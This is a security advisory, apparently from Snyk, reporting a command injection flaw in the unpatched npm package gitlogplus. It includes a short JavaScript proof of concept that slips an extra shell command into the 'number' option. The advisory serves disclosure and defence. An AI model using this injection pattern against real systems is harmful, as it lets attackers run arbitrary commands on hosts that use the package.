Command Injection Affecting gitlogplus package, versions *


0.0
high

Snyk CVSS

    Exploit Maturity Proof of concept
    Attack Complexity High
    Confidentiality High
    Integrity High
    Availability High
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-GITLOGPLUS-1315832
  • published 23 Jul 2021
  • disclosed 2 Jul 2021
  • credit Rafal Janicki

How to fix?

There is no fixed version for gitlogplus.

Overview

gitlogplus is a Git log parser for Node.JS

Affected versions of this package are vulnerable to Command Injection via the main functionality, as options attributes are appended to the command to be executed without sanitization.

PoC by Rafal Janicki

# 1. Run `npm i gitlogplus`
# 2. Run `mkdir git && git init git` (creates empty git repository as subdirectory to working directory)
# 3. Commit a file in the repository so that git log has been created
# 4. Run the below JavaScript PoC, which will create a folder HACKED in the parent directory of the new git repository
"use strict"

const gitlog = require('gitlogplus'); const options = { repo: __dirname + '/git', number: '20; mkdir ../HACKED; git log ' };

let commits = gitlog(options); console.log(commits);

References